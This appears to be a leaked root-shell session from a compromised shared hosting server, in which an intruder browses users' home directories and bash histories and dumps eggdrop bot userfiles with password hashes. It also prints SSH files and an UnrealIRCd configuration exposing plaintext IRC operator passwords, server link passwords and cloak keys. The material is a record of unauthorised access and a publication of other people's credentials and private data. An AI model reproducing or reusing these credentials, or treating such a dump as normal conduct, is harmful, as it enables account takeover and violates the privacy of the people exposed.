--rw-r----- 1 egg mail 34 Aug 9 2007 .shadow
-drwx------ 2 egg egg 4096 Aug 12 2007 .ssh
-[root@demon2 egg]# ls -al efnet/
-total 1508
-drwxrwxr-x 3 egg egg 4096 Apr 14 23:10 .
-drwx--x--x 10 egg egg 4096 Mar 23 11:26 ..
-drwx------ 2 egg egg 4096 Mar 23 11:30 ...
--rwx------ 1 egg egg 1497940 Mar 23 12:35 fight
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.bloo
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.etho
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.hacker
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.hthbot
--rw-r--r-- 1 egg egg 5 Mar 23 11:51 .pid.hthbot.
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.logic
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.notgay
-[root@demon2 egg]# ls -al eggdrop
-total 1260
-drwx------ 11 egg egg 4096 Apr 21 14:00 .
-drwx--x--x 10 egg egg 4096 Mar 23 11:26 ..
--rwxrw-r-- 1 egg egg 2277 Mar 23 00:31 boneless.botchk
--rw------- 1 egg egg 1264 Apr 21 14:00 boneless.chan
--rw------- 1 egg egg 1264 Apr 21 00:00 boneless.chan~bak
--rw-r--r-- 1 egg egg 52983 Mar 23 11:36 boneless.conf
--rw------- 1 egg egg 1183 Apr 21 14:00 boneless.user
--rw------- 1 egg egg 1183 Apr 21 00:00 boneless.user~bak
-drwxrwxr-x 5 egg egg 4096 Aug 13 2007 doc
-lrwxrwxrwx 1 egg egg 14 Aug 13 2007 eggdrop -> eggdrop-1.6.18
--rwxr-xr-x 1 egg egg 888159 Aug 13 2007 eggdrop-1.6.18
-drwxrwxr-x 3 egg egg 4096 Aug 13 2007 filesys
-drwxrwxr-x 4 egg egg 4096 Aug 13 2007 help
--rwxrw-r-- 1 egg egg 2272 Mar 23 00:31 keebler.botchk
--rw------- 1 egg egg 1263 Apr 21 14:00 keebler.chan
--rw------- 1 egg egg 1263 Apr 21 00:00 keebler.chan~bak
--rw-r--r-- 1 egg egg 52956 Mar 23 11:32 keebler.conf
--rw------- 1 egg egg 1305 Apr 21 14:00 keebler.user
--rw------- 1 egg egg 1305 Apr 21 00:00 keebler.user~bak
-drwxrwxr-x 2 egg egg 4096 Aug 13 2007 language
-drwxrwxr-x 2 egg egg 4096 Apr 21 03:05 logs
-lrwxrwxrwx 1 egg egg 14 Aug 13 2007 modules -> modules-1.6.18
-drwxrwxr-x 2 egg egg 4096 Aug 13 2007 modules-1.6.18
-drwx------ 3 egg egg 4096 Aug 19 2007 netbots
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.boneless
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.keebler
--rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.sentry
--rw-rw-r-- 1 egg egg 6 Apr 14 23:09 pid.V0LTR0N
--rw-r--r-- 1 egg egg 25077 Aug 13 2007 README
-drwxrwxr-x 2 egg egg 4096 Mar 23 00:31 scripts
--rwxrw-r-- 1 egg egg 2267 Mar 23 00:31 sentry.botchk
--rw------- 1 egg egg 1257 Apr 21 13:59 sentry.chan
--rw------- 1 egg egg 1257 Apr 21 00:00 sentry.chan~bak
--rw-r--r-- 1 egg egg 52950 Mar 23 00:03 sentry.conf
--rw------- 1 egg egg 1327 Apr 21 13:59 sentry.user
--rw------- 1 egg egg 1327 Apr 21 00:00 sentry.user~bak
-drwxrwxr-x 2 egg egg 4096 Aug 13 2007 text
--rw------- 1 egg egg 1415 Apr 21 14:00 v0ltr0n.chan
--rw------- 1 egg egg 1415 Apr 21 00:00 v0ltr0n.chan~bak
--rw-r--r-- 1 egg egg 52890 Apr 14 23:09 v0ltr0n.conf
--rw------- 1 egg egg 0 Apr 21 14:00 v0ltr0n.notes
--rw------- 1 egg egg 1273 Apr 21 14:00 v0ltr0n.user
--rw------- 1 egg egg 1273 Apr 21 00:00 v0ltr0n.user~bak
-[root@demon2 egg]# grep -v "^#" eggdrop/v0ltr0n.conf | grep -v ^$
-set username "v0ltr0n"
-set admin "Altaaf <email:>"
-set network ""
-set timezone "EST"
-set offset "5"
-set my-hostname ""
-set my-ip ""
-set max-logs 5
-set max-logsize 0
-set quick-logs 0
-set raw-log 0
-logfile mco * "logs/eggdrop.log"
-logfile jpk #lamest "logs/lamest.log"
-set log-time 1
-set keep-all-logs 0
-set logfile-suffix ".%d%b%Y"
-set switch-logfiles-at 300
-set quiet-save 1
-set console "mkcobxs"
-set userfile "v0ltr0n.user"
-set sort-users 0
-set help-path "help/"
-set text-path "text/"
-set temp-path "/tmp"
-set motd "text/motd"
-set telnet-banner "text/banner"
-set userfile-perm 0600
-set botnet-nick "V0LTR0N"
-listen 11800 bots
-listen 11801 users
-set remote-boots 2
-set share-unlinks 1
-set protect-telnet 0
-set dcc-sanitycheck 0
-set ident-timeout 5
-set require-p 0
-set open-telnets 0
-set stealth-telnets 0
-set use-telnet-banner 0
-set connect-timeout 15
-set dcc-flood-thr 3
-set telnet-flood 5:60
-set paranoid-telnet-flood 1
-set resolve-timeout 15
-set reserved-portrange 11820:11830
-set ignore-time 15
-set hourly-updates 00
-set owner "Altaaf"
-set notify-newusers "$owner"
-set default-flags "hp"
-set whois-fields "url birthday"
-set die-on-sighup 0
-set die-on-sigterm 1
-unbind dcc n tcl *dcc:tcl
-unbind dcc n set *dcc:set
-set must-be-owner 1
-unbind dcc n simul *dcc:simul
-set max-dcc 50
-set allow-dk-cmds 1
-set dupwait-timeout 5
-set mod-path "modules/"
-loadmodule dns
-loadmodule channels
-set chanfile "v0ltr0n.chan"
-set force-expire 0
-set share-greet 0
-set use-info 1
-set global-flood-chan 10:60
-set global-flood-deop 3:10
-set global-flood-kick 3:10
-set global-flood-join 5:60
-set global-flood-ctcp 3:60
-set global-flood-nick 5:60
-set global-aop-delay 5:30
-set global-idle-kick 0
-set global-chanmode "nt"
-set global-stopnethack-mode 0
-set global-revenge-mode 0
-set global-ban-time 120
-set global-exempt-time 60
-set global-invite-time 60
-set global-chanset {
- -autoop +autovoice
- -bitch +cycle
- +dontkickops +dynamicbans
- +dynamicexempts +dynamicinvites
- -enforcebans +greet
- -inactive -nodesynch
- -protectfriends +protectops
- -revenge -revengebot
- -secret -seen
- +shared +statuslog
- +userbans +userexempts
- +userinvites -protecthalfops
- -autohalfop
-loadmodule server
-set net-type 5
-set nick "v0ltr0n"
-set altnick "v0ltr0n?"
-set realname "v0ltr0n"
-bind evnt - init-server evnt:init_server
-proc evnt:init_server {type} {
- global botnick
- putquick "MODE $botnick +i-wsx"
-set default-port 6667
-set servers {
-set keep-nick 1
-set strict-host 0
-set quiet-reject 1
-set lowercase-ctcp 0
-set answer-ctcp 3
-set flood-msg 5:60
-set flood-ctcp 3:60
-set never-give-up 1
-set server-cycle-wait 60
-set server-timeout 60
-set servlimit 0
-set check-stoned 1
-set serverror-quit 1
-set max-queue-msg 300
-set trigger-on-ignore 0
-set exclusive-binds 0
-set double-mode 1
-set double-server 1
-set double-help 1
-set optimize-kicks 1
-set stack-limit 4
-loadmodule ctcp
-set ctcp-mode 0
-loadmodule irc
-set bounce-bans 1
-set bounce-exempts 0
-set bounce-invites 0
-set bounce-modes 0
-set max-bans 100
-set max-exempts 20
-set max-invites 20
-set max-modes 100
-set kick-fun 0
-set ban-fun 0
-set learn-users 0
-set wait-split 600
-set wait-info 180
-set mode-buf-length 200
-unbind msg - ident *msg:ident
-unbind msg - addhost *msg:addhost
-set opchars "@"
-set no-chanrec-info 0
-set prevent-mixing 1
-loadmodule transfer
-set max-dloads 3
-set dcc-block 0
-set copy-to-tmp 1
-set xfer-timeout 30
-loadmodule share
-loadmodule compress
-set share-compressed 1
-loadmodule filesys
-set files-path "/home/protect/eggdrop/filesys"
-set incoming-path "/home/protect/eggdrop/filesys/incoming"
-set upload-to-pwd 0
-set filedb-path ""
-set max-file-users 20
-set max-filesize 1024
-loadmodule notes
-set notefile "v0ltr0n.notes"
-set max-notes 50
-set note-life 60
-set allow-fwd 0
-set notify-users 1
-set notify-onjoin 1
-loadmodule console
-set console-autosave 1
-set force-channel 0
-set info-party 0
-loadmodule seen
-loadmodule blowfish
-loadmodule uptime
-source scripts/alltools.tcl
-source scripts/action.fix.tcl
-source netbots/netbots.tcl
-source scripts/http.tcl
-source scripts/fsck.tcl
-source scripts/news.tcl
-source scripts/google.tcl
-source scripts/pcheck.tcl
-source scripts/dns.tcl
-source scripts/movies.tcl
-source scripts/userinfo.tcl
-[root@demon2 egg]# cat eggdrop/v0ltr0n.user
-#4v: eggdrop v1.6.18 -- V0LTR0N -- written Mon Apr 21 14:00:00 2008
-boneless - bfloN
---BOTFL ghp
---HOSTS *!
---LASTON 1198721898 #g00ns
---XTRA created 1187476753
---PASS 8bky9t3q4ey6t
-sentry - bfloN
---HOSTS *!sentry@
---LASTON 1198721877 unlinked
---XTRA created 1187476804
---PASS f2w7bi713nyoxl
-keebler - bfloN
---HOSTS *!keebler@
---LASTON 1198721898 unlinked
---XTRA created 1187476804
---PASS i347t6epn2
-v0ltr0n - bfloN
---HOSTS *!v0ltr0n@
---LASTON 1208758936 #priv
---XTRA created 1187476804
---PASS gcc8k5hi44w1
-Altaaf - hjlmnoptx
---HOSTS *!
---HOSTS -telnet!*@*
---LASTON 1190453133 @boneless
---PASS +GviW90Qn.aQ0
---XTRA created 1187300220
-c0ma - hjlmnoptx
---HOSTS *!*
---LASTON 1187920073 @boneless
---PASS +3EuN1.om33a.
---XTRA created 1187570739
-::#BlackIRC bans
-::#priv bans
-*exempt - -
-% *!*
-&&#BlackIRC exempts
-&&#priv exempts
-$$#BlackIRC invites
-$$#priv invites
-[root@demon2 egg]# ls -al eggdrop/v0ltr0n.notes
--rw------- 1 egg egg 0 Apr 21 14:00 eggdrop/v0ltr0n.notes
-[root@demon2 egg]# cd eggdrop/logs/
-[root@demon2 logs]# ls -al
-total 84
-drwxrwxr-x 2 egg egg 4096 Apr 21 03:05 .
-drwx------ 11 egg egg 4096 Apr 21 14:00 ..
--rw-r--r-- 1 egg egg 411 Aug 13 2007 CONTENTS
--rw-rw-r-- 1 egg egg 68581 Apr 21 14:15 eggdrop.log
-[root@demon2 logs]# head eggdrop.log
-[03:05] @#BlackIRC (+stn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0]
-[03:05] @#priv (+tn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0]
-[03:05] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0]
-[03:05] #g00ns (+trna) : [m/52 o/8 h/3 v/6 n/35 b/12 e/0 I/0]
-[03:05] #HighTechHost (+tn) : [m/26 o/24 h/0 v/0 n/2 b/0 e/0 I/0]
-[03:05] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0]
-[03:05] #HighTechHost (+tn) : [m/26 o/24 h/0 v/0 n/2 b/0 e/0 I/0]
-[03:05] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0]
-[03:10] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0]
-[03:10] #g00ns (+trna) : [m/52 o/8 h/3 v/6 n/35 b/12 e/0 I/0]
-[root@demon2 logs]# tail eggdrop.log
-[14:10] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0]
-[14:10] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0]
-[14:15] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0]
-[14:15] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0]
-[14:15] @#BlackIRC (+stn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0]
-[14:15] @#priv (+tn) : [m/2 o/1 h/0 v/0 n/1 b/0 e/0 I/0]
-[14:15] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0]
-[14:15] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0]
-[14:15] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0]
-[14:15] #g00ns (+trna) : [m/57 o/10 h/3 v/10 n/34 b/12 e/0 I/0]
-[root@demon2 logs]# cd ..
-[root@demon2 eggdrop]# cd /home
-[root@demon2 home]# cd evilcode
-[root@demon2 evilcode]# ls -al
-total 148
-drwxr-xr-x 9 evilcode evilcode 4096 Mar 25 13:40 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-drwx------ 2 evilcode evilcode 4096 Aug 1 2007 backups
--rw------- 1 evilcode evilcode 6456 Apr 19 11:25 .bash_history
--rw-r--r-- 1 evilcode evilcode 304 Apr 29 2006 .bash_logout
--rw-r--r-- 1 evilcode evilcode 191 Apr 29 2006 .bash_profile
--rw-r--r-- 1 evilcode evilcode 124 Apr 29 2006 .bashrc
-drwx--x--x 3 evilcode evilcode 4096 Apr 29 2006 domains
--rw-r--r-- 1 evilcode evilcode 383 Apr 29 2006 .emacs
-drwxrwx--- 3 evilcode evilcode 4096 Aug 1 2007 imap
-drwxrwxr-x 2 evilcode evilcode 4096 Aug 8 2007 index0r_img
--rw-rw-r-- 1 evilcode evilcode 22825 Feb 24 2007 index.php
--rw-rw-r-- 1 evilcode evilcode 51019 Feb 24 2007
-drwx------ 2 evilcode evilcode 4096 Aug 1 2007 mail
-drwxrwxr-x 3 evilcode evilcode 4096 Mar 25 13:44 newircd
-lrwxrwxrwx 1 evilcode evilcode 36 Aug 1 2007 public_html -> ./domains/
--rw-r----- 1 evilcode mail 34 Aug 7 2007 .shadow
-drwx------ 13 evilcode evilcode 4096 Mar 25 13:44 Unreal3.2
-[root@demon2 evilcode]# cd ../excodeirc
-[root@demon2 excodeirc]# ls -al
-total 65128
-drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-drwxrwxr-x 7 excodeirc excodeirc 4096 May 27 2006 anope-1.6.4
--rw-rw-r-- 1 excodeirc excodeirc 3840000 Sep 8 2005 anope-1.6.4.tar
-drwxr-xr-x 7 excodeirc excodeirc 4096 Jun 19 2007 anope-1.7.19
--rw-rw-r-- 1 excodeirc excodeirc 1505639 Jun 10 2007 anope-1.7.19.tar.gz
-drwxrwxr-x 2 excodeirc excodeirc 4096 Feb 10 12:47 back
-drwx------ 2 excodeirc excodeirc 4096 Aug 1 2007 backups
--rw------- 1 excodeirc excodeirc 11324 Apr 14 23:11 .bash_history
--rw-r--r-- 1 excodeirc excodeirc 304 Apr 28 2006 .bash_logout
--rw-r--r-- 1 excodeirc excodeirc 191 Apr 28 2006 .bash_profile
--rw-r--r-- 1 excodeirc excodeirc 124 Apr 28 2006 .bashrc
-drwxr-xr-x 4 excodeirc excodeirc 4096 Mar 25 19:58 defender
-drwx--x--x 5 excodeirc excodeirc 4096 Mar 17 18:08 domains
-drwxrwxr-x 10 excodeirc excodeirc 4096 Mar 22 20:57 eggdrop
-drwx------ 2 excodeirc excodeirc 4096 Jun 25 2007 .elinks
--rw-r--r-- 1 excodeirc excodeirc 383 Apr 28 2006 .emacs
-drwxr-xr-x 3 root root 4096 Mar 22 20:56 hightechhost
-drwxrwx--- 5 excodeirc mail 4096 Mar 17 18:08 imap
--rw-rw-r-- 1 excodeirc excodeirc 13375456 Jun 17 2007 ircbackup.tar.gz
-drwxrw-r-- 2 excodeirc excodeirc 4096 Jul 15 2007 .linuxcounter
--rwxr-xr-x 1 excodeirc excodeirc 36620 Jan 21 2007 machine-update
-drwx------ 2 excodeirc excodeirc 4096 Mar 17 18:08 mail
-drwxrwxr-x 9 excodeirc excodeirc 4096 Jan 15 20:23 NeoStats3.0
--rw-rw-r-- 1 excodeirc excodeirc 32491520 Sep 2 2006 neostatsbackup.tar
-drwxrwxr-x 5 excodeirc excodeirc 4096 Apr 30 2006 OPSB-3.0.a3
--rw-rw-r-- 1 excodeirc excodeirc 1464320 Dec 13 2005 OPSB-3.0.a3.tar
-lrwxrwxrwx 1 excodeirc excodeirc 43 Aug 1 2007 public_html -> ./domains/
-drwxr-xr-x 4 excodeirc g00ns83 4096 Nov 30 14:27 randword-3.2
-drwxrwxr-x 5 excodeirc excodeirc 4096 Apr 30 2006 SecureServ-3.0.a3
--rw-rw-r-- 1 excodeirc excodeirc 1904640 Dec 13 2005 SecureServ-3.0.a3.tar
-drwxrwxr-x 6 excodeirc excodeirc 4096 Dec 2 17:27 services
-drwxrwxr-x 7 excodeirc excodeirc 4096 Jun 19 2007 servicesnew
--rw-r----- 1 excodeirc mail 34 Sep 17 2007 .shadow
-drwx------ 2 excodeirc excodeirc 4096 Dec 3 2006 .ssh
-drwxrwxrwx 13 excodeirc excodeirc 4096 Apr 30 2006 trunk
--rw-rw-r-- 1 excodeirc excodeirc 9197056 Apr 30 2006 trunk.tar
-drwx------ 13 excodeirc excodeirc 4096 Apr 14 22:26 Unreal3.2
--rw-rw-r-- 1 excodeirc excodeirc 2629222 Feb 18 2007 Unreal3.2.6.tar.gz
-drwx------ 13 excodeirc excodeirc 4096 Feb 10 12:43 Unrealfuck
-drwx------ 13 excodeirc excodeirc 4096 Jun 17 2007 unrealold
-[root@demon2 excodeirc]# head .bash_history
-cd Ur*
-cd Un*
-nano 0w unreal*
-nano -w unreal*
-nano -w unrealircd*
-./unreal restart
-ps ax
-[root@demon2 excodeirc]# tail .bash_history
-cd services
-nano services.conf
-cd /home/excodeirc
-cd anope-1.7.19
-cd /home/excodeirc
-[root@demon2 excodeirc]# ls -al .ssh
-total 12
-drwx------ 2 excodeirc excodeirc 4096 Dec 3 2006 .
-drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 ..
--rw-r--r-- 1 excodeirc excodeirc 395 Dec 3 2006 known_hosts
-[root@demon2 excodeirc]# cat .ssh/*
- ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm215adR0bmHDNKkjOQeI/
-[root@demon2 excodeirc]# ls -al eggdrop/*.conf
--rw-r--r-- 1 excodeirc excodeirc 51580 Mar 22 20:57 eggdrop/eggdrop.conf
-[root@demon2 excodeirc]# cd Unreal3.2
-Don't mind us, we're gonna cut out some crap like
-default comments from the unrealircd.conf
-[root@demon2 Unreal3.2]# cat unrealircd.conf
-loadmodule "src/modules/";
-loadmodule "src/modules/";
-loadmodule "src/modules/";
-loadmodule "src/modules/";
-#loadmodule "src/modules/";
-include "spamfilter.conf";
- name "";
- info "Let the good times roll";
- numeric 12;
-admin {
- "pr0be";
- "";
-class clients
- pingfreq 180;
- maxclients 5000;
- sendq 1000000000;
- recvq 8000;
-class servers
- pingfreq 290;
- maxclients 100; /* Max servers we can have linked at a
-time */
- sendq 999999999;
- connfreq 100000; /* How many seconds between each connection
-attempt */
-oper pr0be {
- from {
- userhost "*@*";
- };
- password "spiggers666";
- class "default";
- flags {
- netadmin;
- services-admin;
- global;
- helpop;
- can_rehash
- can_globalnotice;
- can_globalroute;
- can_globops;
- can_wallops;
- can_unkline;
- can_kline;
- can_globalkill;
- can_zline;
- can_gkline;
- can_gzline;
- get_umodew;
- get_host;
- can_override;
- can_die;
- can_restart;
- };
-oper sCuZz {
- from {
- userhost "*@*";
- };
- password "!beanerl0ve!";
- class "default";
- flags {
- netadmin;
- services-admin;
- global;
- helpop;
- can_rehash
- can_globalnotice;
- can_globalroute;
- can_globops;
- can_wallops;
- can_unkline;
- can_kline;
- can_globalkill;
- can_zline;
- can_gkline;
- can_gzline;
- get_umodew;
- get_host;
- can_override;
- can_die;
- can_restart;
- };
-oper Genocide {
- from {
- userhost "*@*";
- };
- password "s,7B0L=QEtaS";
- class "default";
- flags {
- netadmin;
- services-admin;
- global;
- helpop;
- can_rehash
- can_globalnotice;
- can_globalroute;
- can_globops;
- can_wallops;
- can_unkline;
- can_kline;
- can_globalkill;
- can_zline;
- can_gkline;
- can_gzline;
- get_umodew;
- get_host;
- can_override;
- can_die;
- can_restart;
- };
-allow {
- ip *@*;
- hostname *@*;
- class clients;
- maxperip 15;
-listen {
- options {
- ssl;
- clientsonly;
- };
-listen {
- options {
- ssl;
- serversonly;
- };
-except tkl {
- mask uid0@208.98.32.*;
- type {
- gline;
- gzline;
- qline;
- gqline;
- shun;
- };
- username *;
- hostname ;
- bind-ip *;
- port 10200;
- hub *;
- password-connect "oisdkgasdgweeab00";
- password-receive "oisdkgasdgweeab00";
- class servers;
- options {
- autoconnect;
-# zip;
- ssl;
-# nohostcheck;
- };
-link lulz.hub
- username *;
- hostname;
- bind-ip *;
- port 16969;
- hub *;
- password-connect "blarghh65vjh97t8c7hst8";
- password-receive "blarghh65vjh97t8c7hst8";
- class servers;
- options {
- autoconnect;
- ssl;
- username *;
- hostname;
- bind-ip *;
- port 6667;
- hub *;
- password-connect "dei8hw0u";
- password-receive "dei8hw0u";
- class servers;
- options {
- autoconnect;
-# zip;
- nohostcheck;
- };
-ulines {;;;;;;
- disable-map yes;
- disable-links yes;
- map-deny-message "*** Command /map is disabled for security reasons";
- links-deny-message "*** Command /links is disabled for security reasons";
- hide
- {
- };
-deny channel {
- channel "oreos";
- reason "Grow up";
-ban nick {
- mask "PwNd-*";
- reason "bots";
-/* Network configuration */
-set {
- network-name "goodtimes";
- default-server "";
- services-server "";
-# stats-server "";
- help-channel "#Help";
- hiddenhost-prefix "aintgay";
- /* prefix-quit "no"; */
- cloak-keys {
- qofdie998H99mF97f97MF9;
- myc886C8V7tmv87tmvcM6C;
- 42ZA643ZXn6745eC87r6VM;
- };
- /* on-oper host */
- hosts {
- local "";
- global "";
- coadmin "";
- admin "";
- servicesadmin "";
- netadmin "";
- host-on-oper-up "no";
- };
-/* Server specific configuration */
-set {
- kline-address "";
- modes-on-connect "+x";
- modes-on-oper "+xwgs";
- oper-auto-join "#spk";
- dns {
- nameserver;
- timeout 2s;
- retries 2;
- };
- options {
- hide-ulines;
- /* You can enable ident checking here if you want */
- /* identd-check; */
- show-connect-info;
- };
- maxchannelsperuser 1000000;
- /* The minimum time a user must be connected before being
-allowed to use a QUIT
- * This will hopefully help stop spam */
- anti-spam-quit-message-time 10s;
- oper-only-stats "okfGsMRUEelLCXzdD";
- /* Throttling: this example sets a limit of 3 connections per
-60s (per host). */
- throttle {
- connections 3;
- period 60s;
- };
- /* Anti flood protection */
- anti-flood {
- nick-flood 3:60; /* 3 nickchanges per 60 seconds
-(the default) */
- };
- /* Spam filter */
- spamfilter {
- ban-time 1d; /* default duration of a *line ban set by
-spamfilter */
- ban-reason "Spam/Advertising"; /* default reason */
- virus-help-channel "#help"; /* channel to use for
-'viruschan' action */
- /* except "#help"; channel to exempt from filtering */
- };
-[root@demon2 Unreal3.2]# cd ..
-[root@demon2 excodeirc]# cd services
-[root@demon2 services]# ls
-backups hosts.db listnicks news.db services tables.sql
-bot.db example.conf languages logs nick.db services.chk
-chan.db exception.db listchans modules oper.db services.conf
-[root@demon2 services]#
-[root@demon2 services]# cd /home/felosi
-[root@demon2 felosi]# ls -al
-total 91140
-drwx--x--x 7 felosi felosi 4096 Feb 10 12:51 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
--rw-r--r-- 1 felosi felosi 72806123 Oct 5 2007 backup-10.5.2007_21-30-03_hywdinfo.tar.gz
--rw------- 1 felosi felosi 403 Dec 28 11:46 .bash_history
--rw-r--r-- 1 felosi felosi 24 Aug 3 2007 .bash_logout
--rw-r--r-- 1 felosi felosi 176 Aug 3 2007 .bash_profile
--rw-r--r-- 1 felosi felosi 124 Aug 3 2007 .bashrc
--rw-rw-r-- 1 felosi felosi 6136 Aug 29 2007 da.cpanel.import.9beta2.tar.gz
--rwxrwxrwx 1 felosi felosi 20561 Aug 29 2007
--rwxrwxrwx 1 felosi felosi 280 Oct 5 2007 defaults.conf
-drwx--x--x 5 felosi felosi 4096 Aug 3 2007 domains
--rw-r----- 1 felosi felosi 20324841 Nov 12 16:31 earn.tar.gz
-drwxrwxr-x 2 felosi felosi 4096 Oct 5 2007 export
-drwxrwxr-x 2 felosi felosi 4096 Oct 5 2007 import
--rw-r----- 1 felosi mail 34 Aug 3 2007 .shadow
-drwx--x--x 2 felosi felosi 4096 Dec 28 11:35 user_backups
-drwxr-xr-x 3 felosi felosi 4096 Dec 13 22:41 webmail
-[root@demon2 felosi]# cat .bash_history
-tar zxvf da.cpanel.import.9beta2.tar.gz
-chmod 777 defaults.conf
-mkdir import export
-nano -w defaults.conf
-ls import
-ls user*
-cp backup-10.5.2007_21-30-03_hywdinfo.tar.gz import
-per *.pl
-perl *.pl
-cd export
-cp hywdinfo.tar.gz ../user_backups
-cd ../user_backups
-cd user_*
-[root@demon2 felosi]# cd ../felosii
-[root@demon2 felosii]# ls -al
-total 48
-drwx--x--x 6 felosii felosii 4096 Aug 1 2007 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-drwx------ 2 felosii felosii 4096 Aug 1 2007 backups
--rw-r--r-- 1 felosii felosii 24 Jun 30 2007 .bash_logout
--rw-r--r-- 1 felosii felosii 191 Jun 30 2007 .bash_profile
--rw-r--r-- 1 felosii felosii 124 Jun 30 2007 .bashrc
-drwx--x--x 3 felosii felosii 4096 Jun 30 2007 domains
--rw-r--r-- 1 felosii felosii 383 Jun 30 2007 .emacs
-drwxrwx--- 3 felosii felosii 4096 Aug 1 2007 imap
-drwx------ 2 felosii felosii 4096 Aug 1 2007 mail
-lrwxrwxrwx 1 felosii felosii 36 Aug 1 2007 public_html -> ./domains/
--rw-r----- 1 felosii mail 34 Jun 30 2007 .shadow
-[root@demon2 felosii]# cd ../g00ns83
-[root@demon2 g00ns83]# ls -al
-total 64
-drwx--x--x 9 g00ns83 g00ns83 4096 Apr 18 21:47 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-drwxrwxr-x 4 g00ns83 g00ns83 4096 Apr 18 21:52 backup
-drwx------ 2 g00ns83 g00ns83 4096 Aug 2 2007 backups
--rw------- 1 g00ns83 g00ns83 2218 Dec 30 11:59 .bash_history
--rw-r--r-- 1 g00ns83 g00ns83 24 Aug 2 2007 .bash_logout
--rw-r--r-- 1 g00ns83 g00ns83 176 Aug 2 2007 .bash_profile
--rw-r--r-- 1 g00ns83 g00ns83 124 Aug 2 2007 .bashrc
--rw------- 1 g00ns83 g00ns83 232 Apr 18 21:47 .clipboard.txt
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 domains
-drwxrwx--- 3 g00ns83 g00ns83 4096 Aug 2 2007 imap
-drwx------ 2 g00ns83 g00ns83 4096 Aug 2 2007 mail
-drwxrwx--- 15 g00ns83 g00ns83 4096 Aug 2 2007 Maildir
-lrwxrwxrwx 1 g00ns83 g00ns83 37 Aug 2 2007 public_html -> ./domains/
--rw-r----- 1 g00ns83 mail 34 Mar 7 19:56 .shadow
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Jan 29 11:45 webmail
-[root@demon2 g00ns83]# cat .bash_history
-cd public_html
-mv index.html indexold
-nano -w includes/config.php
-find c99
-cd public_html
-ls admin1cp/
-ls arc
-ls archive
-ls clientscript
-ls donations
-ls customavatars/
-ls wls
-ls nex
-mkdir /home/g00ns83/backup
-mv nex/Seminar2.rar /home/g00ns83/backup
-ls nex
-rm -rf nex
-ls spic
-mv omg.html /home/g00ns83/backup
-nano in.php
-nano indexold
-mv indexold /home/g00ns83/backup
-ls hax
-rm -rf hax
-nano calendar.php
-mv sawnmapscan /home/g00ns83/backup
-nano sn00gnews.php
-nano vboutput1.php
-ls signaturepics/
-ls signaturepics/signaturepics/
-nano report.php
-nano online.php
-nano technews.php
-nano sendmail
-ls images1
-mv index.html indx.html
-mv oldlayout /home/g00ns83/backup
-nano license
-nano image.php
-ls wls
-ls uploads
-ls tutorials/
-nano downloads.php
-nano in.php
-nano login.php
-ls includes
-cd includes
-nano index.html
-nano functions_bigthree.php
-nano modfunctions.php
-nano functions.php
-cd /home/g00ns83/public_html
-nano mysql
-nano secnews.php
-nano site_members.php
-mv site_members.php /home/g00ns83/backup
-ls z3r0
-ls fusion
-ls /home/g00ns83/backup
-ls images1
-mv images1 /home/g00ns83/backup
-ls botnets
-mv sn00gnews.php /home/g00ns83/backup
-nano secnews.php
-nano vboutput1.php
-cd /
-cd home
-cd /home/g00ns83
-uname -a ; id
-nano index.php
-cd public_html/
-nano index.php
-nano index.php
-nano fusion
-cd fusion
-cd $home
-cd public_html/
-echo $home
-ls wls
-nano wls/index.html
-rm wls/index.html
-chmod 0644 wls
-chmod 777 wls
-mv wls /home/g00ns83/backup
-nano online.php
-nano faq.php
-rm favicon.ico
-mv mysql /home/g00ns83/backup
-cd public_html/includes
-nano -w config.php
-cd public_html
-mkdir sec
-cd sec
-unaip *.zip
-unzip *.zip
-mv phpsecinfo-20070406 php
-rm -rf php
-cd public_html/includes
-nano -w config.php
-chown root:root config.php
-cd public_html
-cd includes
-nano config.php
-nano config.php
-nano config.php
-su sn00g3s
-[root@demon2 g00ns83]# ls -al public_html/
-total 1980
-drwx--x--x 33 g00ns83 g00ns83 4096 Apr 18 21:47 .
-drwxr-xr-x 8 g00ns83 g00ns83 4096 Apr 18 21:38 ..
--rw-r--r-- 1 g00ns83 g00ns83 9058 Apr 18 21:46 404.shtml
-drwxr-xr-x 4 g00ns83 g00ns83 4096 Aug 2 2007 admin1cp
--rw-r--r-- 1 g00ns83 g00ns83 15770 Jun 19 2007 ajax.php
--rw-rw-r-- 1 g00ns83 g00ns83 16362 Jun 19 2007 announcement.php
